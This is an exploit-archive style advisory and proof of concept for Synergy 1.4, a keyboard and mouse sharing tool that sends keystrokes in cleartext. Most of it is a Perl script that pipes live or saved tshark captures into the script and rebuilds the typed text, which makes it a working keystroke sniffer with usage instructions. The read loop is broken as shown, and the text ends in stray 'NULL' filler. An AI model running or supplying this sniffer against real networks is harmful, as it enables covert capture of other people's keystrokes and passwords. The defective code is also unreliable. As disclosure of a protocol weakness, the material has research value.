# Exploit Title: Synergy Protocol cleartext weakness PoC # Date:April 5th 2011 # Author: Sw1tCh # Software Link: http://synergy-foss.org/ # Version: 1.4 # -= Info =- *Synergy* is *Free and Open Source Software* that lets you easily share your mouse and keyboard between multiple computers, where each computer has it's own display. No special hardware is required, all you need is a local area network. Synergy is supported on Windows, Mac OS X and Linux. [Source =~ Synergy-foss.org] #-= The Advisory =- Synergy's sends all keystrokes and mouse movements in clear text. This presents a huge vulnerability because if anyone is capturing packets on the network, they could eavesdrop on all information passed between the multiple computers. # -= PoC Script =- #!/usr/bin/perl # # synergyCap.pl - Developed by Sw1tCh to show the insecurity in Synergy Deskop Sharing application # The program works a lot better when through a closed network of one type of another # [such as an SSH tunnel] # [Note: The text isn't clear. Because of the protocol, text is sent in TCP and even with protocol # Standards, text does come out of order. ########################## # # Obligatory Shouts -> gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's # ########################## use constant BANNER => q{ / / synergyCap -> Live or Forensic extractor of text passeed / / from computers using Synergy Screen sharing / <( - )> / / / PoC Developed by Sw1tCh 2011 / / -> Need to work on my tshark filters...My perl is better :) / / Softward -> Synergy - http://synergy-foss.org/ Usage: - synergyCap.pl -forensic -file [FILE] - synergyCap.pl -live -interface [device {example eth0} ] }; # ----- INCLUDES ----- # use strict; use warnings; use Getopt::Long; use Switch; use Time::HiRes qw( usleep sleep ); use Term::ANSIColor qw(:constants); local $Term::ANSIColor::AUTORESET = 1; print BOLD BLUE BANNER; print "\n"; my $forensic = 0; my $live = 0; my $options = ""; my $capChar = ""; GetOptions ( 'forensic' => \$forensic , 'live' => \$live , 'file' => \my $pcap_file , 'interface' => \my $interface , ); unless ( $ARGV[0] ) { print "ERROR : Bad file or Interface\n"; exit; } unless ( $live || $forensic ) { print "ERROR : No Option Specified [Live / or / Forensic \n"; exit; } if ( $live =~ m/1/ ) { $options = "i"; } elsif ( $forensic =~ m/1/ ) { $options = "r"; } open( TSHARK , "tshark -". $options . " " . $ARGV[0] ." -V |" ) or die "Failed to open TSHARK: $!"; while( ) { if ($_ =~ /Key Id/) { if( $_ =~ s/Key Id\x3A\s//) { if ($_ < 128){ print " " . chr($_) . "\n"; $capChar = $capChar. chr($_); } } } } print "\n\n$capChar "; print "\n---+ Completed +--- \n"; close( TSHARK ); #Credits: Sw1tCh #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, BilboFraggin's -- NULL, NULL NULL NULL NULL NULL NULL NULL NULL.NULL (NULL) NULL - NULL